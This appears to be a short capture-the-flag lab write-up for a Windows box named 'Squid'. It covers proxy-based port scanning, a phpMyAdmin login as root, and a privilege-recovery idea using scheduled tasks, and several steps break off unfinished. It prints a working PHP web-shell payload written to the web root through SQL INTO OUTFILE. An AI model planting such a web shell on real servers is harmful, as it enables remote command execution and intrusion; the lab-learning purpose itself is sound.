Skip to content

Squid 🔹

Enumeration

Page at port 3128 is the squid proxy error page.

We can connect to the proxy for discovering more ports. We can use https://github.com/aancw/spose.

┌──(kali㉿kali)-[~/Desktop/spose]
└─$ python3 spose.py --proxy http://192.168.120.223:3128 --target 127.0.0.1
Using proxy address http://192.168.120.223:3128
127.0.0.1 3306 seems OPEN 
127.0.0.1 8080 seems OPEN

A mysql service and a wamp service. We can access the wamp one with foxyproxy.

Initial Access

Now, accessing port 8080, we can see the apps. Trying root with phpmyadmin.

Put a PHP shell:

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'C:/wamp/www/wshell.php';

And it can be accessed in the root.

So we can put an encoded PowerShell reverse shell and...

Privilege Escalation

We have restricted permissions. From this resource, we find out that when a LOCAL SERVICE or NETWORK SERVICE is configured to run with a restricted set of privileges, permissions can be recovered by creating a scheduled task. The new process created by the Task Scheduler Service will have all the default privileges of the associated user account.

So, first, create a task:

Post Exploitation

Get the flag.